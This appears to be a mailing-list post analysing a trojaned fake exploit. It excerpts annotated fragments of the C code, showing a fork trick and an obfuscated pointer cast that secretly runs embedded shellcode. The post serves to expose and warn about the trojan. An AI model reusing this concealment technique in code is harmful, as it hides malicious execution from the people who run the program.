Below I have excerpted the obvious pieces of the trojan.  The functions
which do the deed are set_ptr, and the call to dnsprintflabel.

I just thought some people may have wanted to know how the person who
wrote the trojan hid the shellcode among the seemingly correct exploit.

--Perry

***
*** set_ptr does the fork dance.
***

int
set_ptr(char *buff, int offset, unsigned long val, int s)
{

                if (!fork())

***
*** After the above fork, child does meaningless memcpy and
*** returns to main, causing multiple executions of the trojan
*** shellcode.
***

        memcpy(buff, copy_buff, sizeof(copy_buff));
        return 0;
}

***
*** dnsprintflabel has a lot of crap code in it, but it
*** isn't this function that does the deed, it's the
*** arguments to the function.
***

/* pull out a compressed query name */
char           *
dnsprintflabel(char *s, char *buf, char *p)
{
        return (p);
}


***
*** This is the actual code that does the running of the shellcode.
*** In it he hides a lot of useless casts to hide the inline prototype
*** of the call to the shellcode.
***

        /*
         * encode packet ...
         */
        dnsprintflabel(remote_addr, (char *) (expl_buffer + sizeof(HEADER)),
                 (char *) ((unsigned long) &expl_buffer[0] + sizeof(HEADER) + 1));
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                 |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

                 This is the carefully typecasted prototype for the shellcode, he
                 just skips all the header and pointer crap to actually run the
                 shellcode.  The &expl_buffer[0] + sizeof(HEADER) + 1 is actually
                 just the shellcode he copied from the buffers above, hidden behind
                 some custom types and stuff.

                 EXPLANATION: The & dereference just returns the pointer of the array
                 element at the calculated offset (sizeof(HEADER) +1).  The thing that
                 gives this away as a function call is the extra set of parentheses
                 after the typecast, this is the lexicon for an inline function 
typecast.


--
Perry Harrington                 Director of                   zelur xuniL  ()
[EMAIL PROTECTED]             System Architecture               Think Blue.  /\

PGP signature

Reply via email to